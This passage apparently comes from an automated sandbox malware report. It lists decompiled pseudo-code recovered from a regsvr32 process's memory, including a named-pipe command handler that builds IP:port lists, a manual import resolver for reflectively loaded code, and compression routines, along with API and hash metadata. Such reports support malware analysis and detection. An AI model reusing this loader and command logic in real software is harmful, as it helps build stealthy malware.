                                                                                                                                                                        						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                        						_t31 = _t37;
                                                                                                                                                                        						if(_t37 == 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							_t13 = _t23;
                                                                                                                                                                        							L17:
                                                                                                                                                                        							return _t13;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t38 = _t37 + 1;
                                                                                                                                                                        						_t33 = _t31 + 2;
                                                                                                                                                                        						if( *_t38 == 0x2d) {
                                                                                                                                                                        							_t38 = _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						while( *_t33 == 0x30) {
                                                                                                                                                                        							_t33 = _t33 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t33 != _t38) {
                                                                                                                                                                        							E05B98CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                        							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t6 = _t23 + 3; // 0x5ba1b64
                                                                                                                                                                        						_t12 = _t6;
                                                                                                                                                                        						if(_t12 >= _a8) {
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t35[_t23] = 0x302e;
                                                                                                                                                                        						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                        						_t23 = _t23 + 2;
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        • API String ID: 3619936089-952554281
                                                                                                                                                                        • Opcode ID: 8c3b5e541e0e9e3bf6e3d70f04abde8ddfae1482f3f63c471fc0371ebc7f1879
                                                                                                                                                                        • Instruction ID: dd7a4492efeac0ab349195797f8547befa7ec737c6910e8c19bd68a1367f5c75
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3b5e541e0e9e3bf6e3d70f04abde8ddfae1482f3f63c471fc0371ebc7f1879
                                                                                                                                                                        • Instruction Fuzzy Hash: 7721356374CB143ADB228A28EC85FAE3BC8EF02660F1848E5F9509A180EA61B9404390
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E05B9377F(void* __fp0) {
                                                                                                                                                                        				signed int _v144;
                                                                                                                                                                        				signed int _v152;
                                                                                                                                                                        				char _v160;
                                                                                                                                                                        				char _v164;
                                                                                                                                                                        				char _v168;
                                                                                                                                                                        				signed int _v172;
                                                                                                                                                                        				char _v176;
                                                                                                                                                                        				intOrPtr _v180;
                                                                                                                                                                        				signed int _v184;
                                                                                                                                                                        				signed int _v188;
                                                                                                                                                                        				signed int _v192;
                                                                                                                                                                        				signed int _v196;
                                                                                                                                                                        				char _v200;
                                                                                                                                                                        				signed int _v204;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				unsigned int* _t104;
                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                        				void* _t118;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                        				intOrPtr _t129;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				void* _t133;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                        				signed short* _t149;
                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				signed short* _t192;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				signed int _t199;
                                                                                                                                                                        				signed int _t200;
                                                                                                                                                                        				signed int _t203;
                                                                                                                                                                        				signed int _t204;
                                                                                                                                                                        				char _t205;
                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                        				void* _t208;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t221;
                                                                                                                                                                        
                                                                                                                                                                        				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x5baf818; // 0x5d5f8b0
					_push(0);
					_push( *0x5baf804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x5baf818; // 0x5d5f8b0
					_push(0x80000);
					_push( *0x5baf8bc);
					_push( *0x5baf804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x5baf8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E05BA0962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E05B9D1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x5baf804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E05B9171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E05B98BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E05B9D1A6(_t188);
									L52:
									E05B98BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E05B9A43D(_t203));
									_push(_t203);
									_t189 = 5;
									E05B9D1A6(_t189);
									E05B98BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E05B9A43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E05B9A43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E05B9A43D(_t203) + _t203;
										__eflags = _t110;
										E05B99E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E05B9171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E05B98BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E05BA0962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E05B99B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x5baf8bc; // 0x0
								E05B99EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E05B91DD3(E05B99F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E05B98BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
                                                                                                                                                                        							__eflags = _t205 - 1;
                                                                                                                                                                        							if(__eflags <= 0) {
                                                                                                                                                                        								L28:
                                                                                                                                                                        								_t129 = E05B91DD3(E05B99F6F( *_t200, __eflags), _t127, _v184, 0);
                                                                                                                                                                        								_t208 = _t208 + 0x10;
                                                                                                                                                                        								_v168 = _t129;
                                                                                                                                                                        								E05B99C2C( &_v176);
                                                                                                                                                                        								goto L30;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v204 = _t127;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t132 = E05B99880( *((intOrPtr*)(_t200 + _t148 * 4)), E05B9A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
                                                                                                                                                                        								_t183 = _v204;
                                                                                                                                                                        								_t148 = _t148 + 1;
                                                                                                                                                                        								 *_t183 = _t132;
                                                                                                                                                                        								_v204 = _t183 + 4;
                                                                                                                                                                        								__eflags = _t148 - _t205;
                                                                                                                                                                        							} while (__eflags < 0);
                                                                                                                                                                        							_t127 = _v188;
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t133 = _t118 - 3;
                                                                                                                                                                        						if(_t133 == 0) {
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_t196 = 5;
                                                                                                                                                                        							E05B95EC3(E05B9D1A6(_t196));
                                                                                                                                                                        							_v172 = 1;
                                                                                                                                                                        							goto L56;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t137 = _t133;
                                                                                                                                                                        						if(_t137 == 0) {
                                                                                                                                                                        							_t84 = E05BA0940( &_v200);
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t137 != 1) {
                                                                                                                                                                        							goto L56;
                                                                                                                                                                        						}
                                                                                                                                                                        						E05BA0940( &_v200);
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}
























































                                                                                                                                                                        0x05b93988
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93992
                                                                                                                                                                        0x05b93996
                                                                                                                                                                        0x05b9399b
                                                                                                                                                                        0x05b9399f
                                                                                                                                                                        0x05b939a3
                                                                                                                                                                        0x05b939a5
                                                                                                                                                                        0x05b939ad
                                                                                                                                                                        0x05b939b3
                                                                                                                                                                        0x05b939b7
                                                                                                                                                                        0x05b939bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b939bb
                                                                                                                                                                        0x05b9380a
                                                                                                                                                                        0x05b9396c
                                                                                                                                                                        0x05b9384c
                                                                                                                                                                        0x05b9384d
                                                                                                                                                                        0x05b9384f
                                                                                                                                                                        0x05b93857
                                                                                                                                                                        0x05b93858
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93858
                                                                                                                                                                        0x05b93851
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93851
                                                                                                                                                                        0x05b93810
                                                                                                                                                                        0x05b93813
                                                                                                                                                                        0x05b9388f
                                                                                                                                                                        0x05b93891
                                                                                                                                                                        0x05b93897
                                                                                                                                                                        0x05b93899
                                                                                                                                                                        0x05b93936
                                                                                                                                                                        0x05b93936
                                                                                                                                                                        0x05b93948
                                                                                                                                                                        0x05b9394e
                                                                                                                                                                        0x05b93957
                                                                                                                                                                        0x05b93958
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93958
                                                                                                                                                                        0x05b9389f
                                                                                                                                                                        0x05b938a3
                                                                                                                                                                        0x05b938a6
                                                                                                                                                                        0x05b9392a
                                                                                                                                                                        0x05b9392f
                                                                                                                                                                        0x05b93932
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93932
                                                                                                                                                                        0x05b938a8
                                                                                                                                                                        0x05b938ab
                                                                                                                                                                        0x05b938b3
                                                                                                                                                                        0x05b938b8
                                                                                                                                                                        0x05b938bd
                                                                                                                                                                        0x05b938bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b938c3
                                                                                                                                                                        0x05b938c4
                                                                                                                                                                        0x05b938c6
                                                                                                                                                                        0x05b938f5
                                                                                                                                                                        0x05b93904
                                                                                                                                                                        0x05b93909
                                                                                                                                                                        0x05b9390c
                                                                                                                                                                        0x05b93918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93918
                                                                                                                                                                        0x05b938c8
                                                                                                                                                                        0x05b938cc
                                                                                                                                                                        0x05b938da
                                                                                                                                                                        0x05b938df
                                                                                                                                                                        0x05b938e3
                                                                                                                                                                        0x05b938e4
                                                                                                                                                                        0x05b938e9
                                                                                                                                                                        0x05b938ed
                                                                                                                                                                        0x05b938ed
                                                                                                                                                                        0x05b938f1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b938f1
                                                                                                                                                                        0x05b93815
                                                                                                                                                                        0x05b93818
                                                                                                                                                                        0x05b93860
                                                                                                                                                                        0x05b93861
                                                                                                                                                                        0x05b93864
                                                                                                                                                                        0x05b9386c
                                                                                                                                                                        0x05b93871
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93871
                                                                                                                                                                        0x05b9381b
                                                                                                                                                                        0x05b9381e
                                                                                                                                                                        0x05b93847
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93847
                                                                                                                                                                        0x05b93823
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9382e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9382e
                                                                                                                                                                        0x05b937e7
                                                                                                                                                                        0x05b93b1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 05B937B2
                                                                                                                                                                          • Part of subcall function 05B9D1A6: FlushFileBuffers.KERNEL32(00000000,?,05B93AC6,00000000,00000004), ref: 05B9D1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 05B93B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 465096328-3858738763
                                                                                                                                                                        • Opcode ID: 6e4c9009922e42e1d345a4d2a957721dd8806d175f01cff8090ddf618116d57a
                                                                                                                                                                        • Instruction ID: de995dd20a066d64d4c9799428b25532d59e9f4ef09325ad08b2235ab3084c98
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e4c9009922e42e1d345a4d2a957721dd8806d175f01cff8090ddf618116d57a
                                                                                                                                                                        • Instruction Fuzzy Hash: B2A1B272608302AFDB18EF24D889A7BB7E8FB84310F044DBEF55586180DB35F9458B52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E05BA370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                        				signed int* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				struct HINSTANCE__* _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        
                                                                                                                                                                        				_t167 = __ecx;
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                        					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                        					_v40 = E05B9EFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        					_v32 = _v52;
                                                                                                                                                                        					_t109 = 8;
                                                                                                                                                                        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                        						L24:
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v56 = 0x80000000;
                                                                                                                                                                        					_t112 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_v8 = _v8 + 0x14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t115 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                        						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v8 == 0) {
                                                                                                                                                                        								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        								_v12 =  *_t43 + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v12 =  *_v8 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v28 = _v28 & 0x00000000;
                                                                                                                                                                        							while( *_v12 != 0) {
                                                                                                                                                                        								_v24 = _v24 & 0x00000000;
                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                        								_v64 = _v64 & 0x00000000;
                                                                                                                                                                        								_v20 = _v20 & 0x00000000;
                                                                                                                                                                        								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                        									_v60 =  *_v12 + _a4;
                                                                                                                                                                        									_v20 = _v60 + 2;
                                                                                                                                                                        									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v24 =  *_v12;
                                                                                                                                                                        									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_v24 != _v16) {
                                                                                                                                                                        									_v44 = _v44 + 1;
                                                                                                                                                                        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                        										 *_v12 = _v16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								_v12 =  &(_v12[1]);
                                                                                                                                                                        								_v28 = _v28 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v8 = _v8 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t163 = 0xfffffffd;
                                                                                                                                                                        						return _t163;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L24;
                                                                                                                                                                        				}
                                                                                                                                                                        				return __eax | 0xffffffff;
                                                                                                                                                                        			}
























                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 05BA3728
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 05BA37C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: 5039119d16aa62c3896b8816938d44baec7993318a6ef76d11edb677eabdc5b3
                                                                                                                                                                        • Instruction ID: 1cf1ead2a40be34a93e7a17c4deb6815587c725dd626c66a4608c6361d620e9c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5039119d16aa62c3896b8816938d44baec7993318a6ef76d11edb677eabdc5b3
                                                                                                                                                                        • Instruction Fuzzy Hash: AB618D76E04209EFDB01CF98C485BADBBF1FF08355F248599E815AB291D774AA80DF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E05BA4100(int _a4, signed int _a8) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                        				intOrPtr* _t142;
                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				intOrPtr _t151;
                                                                                                                                                                        				intOrPtr _t161;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t167;
                                                                                                                                                                        				intOrPtr _t170;
                                                                                                                                                                        				signed int _t172;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				int _t184;
                                                                                                                                                                        				intOrPtr _t185;
                                                                                                                                                                        				intOrPtr _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				int _t202;
                                                                                                                                                                        				int _t208;
                                                                                                                                                                        				intOrPtr _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				int _t219;
                                                                                                                                                                        				intOrPtr _t220;
                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                        				signed int _t222;
                                                                                                                                                                        				int _t224;
                                                                                                                                                                        				int _t225;
                                                                                                                                                                        				signed int _t227;
                                                                                                                                                                        				intOrPtr _t228;
                                                                                                                                                                        				int _t232;
                                                                                                                                                                        				int _t234;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				int _t239;
                                                                                                                                                                        				void* _t240;
                                                                                                                                                                        				int _t245;
                                                                                                                                                                        				int _t252;
                                                                                                                                                                        				signed int _t253;
                                                                                                                                                                        				int _t254;
                                                                                                                                                                        				void* _t257;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				int _t259;
                                                                                                                                                                        				intOrPtr _t260;
                                                                                                                                                                        				int _t261;
                                                                                                                                                                        				signed int _t269;
                                                                                                                                                                        				signed int _t271;
                                                                                                                                                                        				intOrPtr* _t272;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        
                                                                                                                                                                        				_t253 = _a8;
                                                                                                                                                                        				_t272 = _a4;
                                                                                                                                                                        				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                        				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        				_t228 =  *_t4;
                                                                                                                                                                        				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                        				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_t269 = 0;
                                                                                                                                                                        				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                        				asm("o16 nop [eax+eax]");
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t8 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                        					_v12 = 0xffff;
                                                                                                                                                                        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                        					if(_t217 < _t141) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        					_t12 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                        					_v8 = _t245;
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                        					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                        					if(_t227 >= _v16) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						if(_t253 != 4) {
                                                                                                                                                                        							L10:
                                                                                                                                                                        							_t269 = 0;
                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t285 = _t227 - _t195;
                                                                                                                                                                        							if(_t227 != _t195) {
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t269 = _t253 - 3;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						E05BA7120(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                        						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                        						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                        						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                        						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                        						E05BA5E80(_t285,  *_t272);
                                                                                                                                                                        						_t202 = _v8;
                                                                                                                                                                        						_t273 = _t273 + 0x14;
                                                                                                                                                                        						if(_t202 != 0) {
                                                                                                                                                                        							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                        							_v8 = _t208;
                                                                                                                                                                        							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t37 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t252 = _v8;
                                                                                                                                                                        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                        							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                        							_t227 = _t227 - _t252;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t227 != 0) {
                                                                                                                                                                        							E05BA5FC0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
